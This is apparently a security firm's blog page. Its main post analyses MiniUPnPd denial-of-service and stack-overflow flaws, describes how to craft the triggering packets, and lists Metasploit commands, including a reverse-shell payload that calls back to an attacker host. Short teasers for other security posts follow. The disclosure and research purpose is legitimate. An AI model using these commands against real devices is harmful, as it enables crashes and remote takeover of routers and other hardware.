#/blog

Using Fiddler

Fiddler is a proxy that can intercept all the HTTP(S) traffic that’s flowing between your client and the server you’re connected to. (more…)

MiniUPnPd Analysis and Exploitation

UPnP Summary

Universal Plug and Play (UPnP) is a network protocol that allows seamless discovery of network devices in order to communicate with each other. The UPnP daemons are enabled by default on various devices like routers, printers, smart TVs etc. UPnP daemon is listening on UDP port 1900 and can expose the SOAP interface to the client. The problem is that there are various vulnerabilities present in UPnP daemon executables as well as the libraries they use which the attacker can use to exploit the target.

We have based our research upon the work of Rapid7 team, which already provided their contribution to the community with the PDF document accessible on Internet [1]. We specifically analyzed at the MiniUPnPd daemon program and provided a PoC Metasploit modules that can exploit present vulnerabilities in older versions of MiniUPnPd. Rapid7 team also addressed the issue of devices exposing SOAP services on the WAN interface. Because of that we wrote a tool called SatUPnP [2]. Our motivation was to write a similar tool like Miranda [3], but with the ability to test UPnP-enabled devices not only on LAN, but also accessible over WAN. The tool does what it promises but should probably be improved with the help of community. You can use and redistribute the tool and use it in your penetration tests.

UPnP Usage and Statistics

Since we’re focused on the MiniUPnPd implementation of the UPnP protocol only we were interested in the version distribution of the MiniUPnPd server programs across the Internet. The MiniUPnPd server currently has nine versions, from 1.0 to 1.8. We used Shodan search engine to get the percentage of each and every version used today. The results are shown in the graph below.

A description...

Update: we received a tip from the HD Moore that the MiniUPnP 1.1 reported itself as 1.0 which is also the reason for high percentage on the picture above.

Please note that the versions 1.7 and 1.8 are now shown, because their percentages are too small (or even zero) to be presented on the graph. We can see that the majority of the devices use MiniUPnPd version 1.0/1.1 (71.5%). This is exactly why we focused on that version of the MiniUPnPd implementation. Let’s first present how the MiniUPnPd version 1.0 is correlated between different operating systems. Shodan search engine was again used to determine the percentages which are presented on the picture below.

A description...

We can see that the majority of the percentage belongs to the Linux 2.4.22, which is identified by Shodan as “Linux/2.4.22-1.2115.nptl”. After that the Debian Linux distribution is following in the second place. But other distributions are also present, like MIPS Linux/2.4, Fedora and OpenWRT. Shodan search engine can also differentiate between different versions of Debian, Fedora and OpenWRT systems that use MiniUPnPd daemon version 1.0. The pictures below present percentage distribution of different versions of the OpenWRT, Debian and Fedora operating systems.

A description... A description... A description...

MiniUPnPd Vulnerabilities

MiniUPnPd is one of the vulnerable daemon implementations which provides a complete UPnP solution as well as IPTables firewall management and a SOAP HTTP service. We already saw that there are multiple versions of the MiniUPnPd implementation the oldest of them being 1.0 which is dominantly being used by many of the devices today.

MiniUpnPd: Denial of Service Vulnerability

A denial of service vulnerability exists in the MiniUPnPd version up until 1.4 which can be used to crash the process, thus making UPnP service inaccessible. The Rapid7 document accessible at [1] specifies that the vulnerability is present in the minissdp.c file in the ProcessSSDPRequest() function.

The picture below [1] clearly presents the CVE-2013-0229 vulnerability, which an attacker can use to cause denial of service. The ProcessSSDPRequest() function takes a socket s as an input parameter. Then it reads at most 1500 bytes from a socket in a recvfrom function call. The first part of the data received in the socket needs to be “M-SEARCH”, so the vulnerable code is accessed. The first yellow block presents the code that scans received input data for ‘ ‘ or ‘ ‘ characters, which means the code is effectively reading and processing line by line. The second yellow code block is reached when the if condition is evaluated to true, which happens when the beginning of the line is equal to “st:” string; the case of the string is ignored, so a case insensitive comparison is used. The first while loop in the second yellow code block scans the input data after the “st:” string for any occurrence of space or tab characters. If it finds one, it continues with the scanning until some other character is detected, upon which it enters the second while loop, where the program scans the rest of the input data looking for ‘ ‘ or ‘ ‘ characters. It continues the scanning until either one of those characters is found, when it finishes and quits.

A description...

The picture below presents the normal packet that can be sent to the MiniUPnPd 1.0 daemon. We can see that the packet starts with the string “M-SEARCH” as it should for the vulnerability to be reached. The first yellow while block then searches for the CRLF characters presented in blue to process each line separately. The packet also specifies the Host HTTP header, which specifies the multicast address and the ST HTTP header whose value is used to trigger a vulnerability. The picture below presents the normal packet that can be sent to the MiniUPnP 1.0 daemon.

A description...

The next picture [1] presents the analysis of the code that leads to the vulnerability in question. As it was already identified by the Rapid7 team, the DoS condition can happen in the first yellow code block if the initial packet doesn’t contain nor the ‘ ‘ nor the ‘ ‘ characters. The while loop will read the value from the memory until such character is found, which can lead to a crash, because the code could attempt to read the memory address that is not in the program’s jurisdiction. But there’s a greater chance that the second yellow block will trigger the vulnerability, which is why we’ll focus on that.

A description...

Let’s examine what happens if we specifically craft the purple part of the packet above. Since we can control only the first 1500 bytes of the input data (as a whole), we need to fill the purple data block with either spaces or tabs, so the first while loop will continue past the end of the input packet. If you carefully look at the picture above, you can see that we didn’t include the ending characters, because that would defeat the purpose and the vulnerability will not be triggered. The second while loop is then searching for either the character ‘ ‘ or ‘\t’ in the memory after the purple input data, which is not what the code intended to achieve. If the program doesn’t find the ‘ ‘ or ‘\t’ characters in subsequent memory, it can cause the process to crash, because it will try to read from memory address that isn’t controlled by the process itself. The important thing to remember is that we should maximize our chances of success by sending the 1500 bytes packet to the target, where the purple block is filled with spaces or tabs.

MiniUPnP: Stack Overflow Vulnerability

Stack overflow vulnerability exists in the MiniUPnPd version 1.0, which can be used to execute arbitrary code on a vulnerable machine. The Rapid7 document [1] specifies that the vulnerability is present in the upnphttp.c. file in the ExecuteSoapAction() function as seen below.

A description...

Let’s take a look at an example packet that can be sent to the MiniUPnPd daemon. The picture below presents such a packet where the POST HTTP method is used to send some data to the SOAP service. The Host HTTP header specifies that the packet is unicast, so it’s only sent to one recipient on port 5555, which accepts SOAP messages. At the end of the packet there is the SOAP data which is being used to request an action from the server. The purple part of the packet is the one that can use stack overflow vulnerability to be triggered.

For the vulnerable function to be reached we need to specify the SOAPAction HTTP header which is colored in green on the picture above. The purple field is its value and specifies the action pointer parameter that gets passed to the ExecuteSoapAction() function. In the first yellow code block we’re scanning the purple field for the ‘#’ and the ‘”‘ characters. The while loop is looking for a valid method name and if it finds one it returns, so the second yellow code block is never be reached. This is why we must ensure that the while loop doesn’t find a valid method name. After the while loop the memset function initializes the method array to zeros and memcpy copies the methodlen bytes after the character ‘#’ in action to the method array. The methodlen is the number of bytes from the character ‘#’ to the character ‘”‘. All this can be easily seen on the picture below [1].

stack

The stack overflow vulnerability is triggered if we supply more than 2048 characters after the character ‘#’ and before the character ‘”‘ in the SOAP action. This will effectively copy that many bytes to the array method which can only accept 2048 bytes of data. If we specifically craft the data we can execute arbitrary code on the target device.

Results

We have written two Metasploit modules for described vulnerabilities. They are already available in the Metasploit repository. If you want to check them out you have to run msfupdate command which will update Metasploit to the latest version. To use the modules you have to enter commands presented below.

To cause denial of service on a vulnerable MiniUPnPd server run the following commands:

> use auxiliary/dos/upnp/miniupnpd_dos msf auxiliary(miniupnpd_dos) > set RHOST [TARGET IP] msf auxiliary(miniupnpd_dos) > set RPORT [TARGET PORT] msf auxiliary(miniupnpd_dos) > exploit

To gain code execution on vulnerable MiniUPnPd server run the following commands:

msf > use exploit/linux/upnp/miniupnpd_soap_bof msf exploit(miniupnpd_soap_bof) > show payloads msf exploit(miniupnpd_soap_bof) > set PAYLOAD generic/shell_reverse_tcp msf exploit(miniupnpd_soap_bof) > set LHOST [MY IP ADDRESS] msf exploit(miniupnpd_soap_bof) > set RHOST [TARGET IP] msf exploit(miniupnpd_soap_bof) > exploit

That should be it. Experiment with the modules and try it on your own MiniUPnPd server. Keep in mind that for security reasons we only disclosed Metasploit modules that work on Debian Linux operating system.

Conclusion

In this document we’ve seen that exploiting known vulnerabilities in software products is relatively easy. We managed to write two working Metasploit modules in relatively short period of time with no prior knowledge of neither UPnP protocol nor the MiniUPnPd daemon implementation. Since there are a large amount of vulnerable MiniUPnPd daemons currently accessible on the Internet an attacker can easily write an exploit to gain code execution on those devices or at least DoS the devices which will make the UPnP unavailable causing different annoyances.

The purpose of this document was not to provide an attacker with exploits that can be leveraged in the wild which is why we provided only PoC of the stack overflow vulnerability on Debian 6 systems which are relatively rare. But the DoS exploitation module should work on all devices that run MiniUPnPd daemon version lower than 1.4.

References:

[1] Rapid7 Team, Security Flaws in Universal Plug and Play, accessible at https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf . [2] https://github.com/viris/upnp-scripts [3] https://code.google.com/p/miranda-upnp/

Teensy and Slovenian Keyboard Layout

Recently we have had a project and we had to simulate attacks with social engineering. One of the attacks was also visiting a company as an IT administrator, gaining access to the premises and inserting a Teensy USB HID into desktop computer running Windows 7 or Windows 8.

(more…)

Malware Surveillance in Slovenia: Science-Fiction or Reality

In the last couple of years malware has reached a widespread use not only in a widespread world, but also in Slovenia. This is not something that isn’t happening in our country, but is a reality. Let’s take a look at the first picture [1], which presents the countries targeted by the NetTraveler malware. We can see that most of the world is affected and Slovenia is also present on the map.

(more…)

Results of Digital Challenge HEK 2013

This year we participated at the conference HEK 2013. We prepared interesting tasks from the field of computer science, information science, cryptography and stenography, programming, and also mathematics. This time there was 39 competitors, so it was difficult to win the competition, because of the fierce opponents. There were total of 29 tasks with total sum points of 6150. The best among the competitors reached 4450 points, and solved 24 tasks. There were also social engineering task, where the competitors had to obtain certain information from beautiful Doroteja, which was required in order to obtain the password for one of the tasks. The competition was open one day before the conference, but was generally held during the conference, the 11th and 12 April. The top three also received practical reward.

I would like to congratulate all of the competitors for solving any digital challenge.

The scores of the top ten users are presented in the table below:

Place Player Solved tasks Points
1 snake 24 4450
2 kernc 20 3900
3 grego87 20 3700
4 deny5 19 3150
5 administrator 18 2850
6 plesauc 16 2650
7 mojca 16 2650
8 marjetica 14 2200
9 tomaz 14 2200
10 matox 15 2200

Wi-Fi Protected Setup (WPS)

The WPS standard was developed in 2007 by the Wi-Fi Alliance (a trade association that promotes wireless LAN technology and certifies products if they conform to certain standards of interoperability) to allow home users who know little of wireless security to set up WPA2 as well as making it easy to add new devices to an existing network. In December 2011 researcher Stefan Viehböck reported a design and implementation flaw to the US-CERT. The flaw makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. The vulnerability note is available on the US-CERT’s web site.

(more…)

Stratfor.si

End of December 2011 group Anonymous attacked Stratfor (Strategic Forecasting Inc.) web page. Results were around 200 GB of important data. Among other data there have been customer information and also CC numbers. This data breach disclosed also some of Slovenian users.

Looking from Slovenia this wouldn’t be anything special, but if we take closer look, follow some data that have been posted on Pastebin, then this looks little bit interesting. If we take a look at the list of Slovenian customers, we see that this list is quite interesting. We find people from government, ministry of defense, media houses, private companies, private unknown companies and even Catholic Church.
(more…)

Results of Digital Challenge Infosek 2011

This year we also participated at the conference Infosek 2011 for the first time. We prepared interesting tasks from the field of computer science, information science, cryptography and stenography, programming, and also mathematics. This time there were relatively few competitors – only 11, which does not mean that competition was not a success. There were total of 32 tasks with total sum points of 5100. The best among the competitors reached 3500 points, and solved 24 tasks. There were also social engineering tasks, where the competitors had to obtain certain information from beautiful Nives, to solve certain tasks. There was also a social engineering task, where the competitors had to penetrate the director of Viris company, Milan Gabor. The competition was held during the conference, the 24th and 25 November, and was prolonged over the weekend till 27th November. The top three also received practical reward.

I would like to congratulate all of the competitors for solving any digital challenge.

The final results of the competition are:

Place Player Solved Tasks Num point
1 punky 24 3500
2 Netis 24 3100
3 kernc 18 2800
4 razi 11 1100
5 arto 6 900
6 citrus 7 700
7 beta 6 600
8 cubeman 5 500
9 test1 5 500
10 m1 2 200
11 janbk 2 200

Ethical hacking

In the last decade the Internet spread like no-one anticipated. A lot of information was moved to the Internet. Almost everything is being digitalized: information is being stored in various databases, services are being performed over the Internet, we’re even paying bills from our computer, etc. But in all this craze, we can ask ourselves one question: what about security?

(more…)

Winning at the event of looking for business solutions

Company Frodx had organized in Kolosej on 25th October an event called Arena of business solutions. Entrepreneurs had competed in business ideas, services and solutions.

Viris competed in a category of Public Administration and Large organizations among organizations like Avtenta, Inovo, Sonce.net, SmartIS and Medic Sistemi.

With business idea »Want to hire a hacker?« we had won a great per cent of votes in a first round of voting for presenting business idea and usefulness of business idea.

Then, public voted for three finalists. We had come among first three business ideas. Competitors had to once again answer on questions from the public and other specilaists.

After final presentations and answers on questions, public had chosen the winner of this event and we are proud to tell, that our CEO, Milan Gabor, won the competition with best business idea.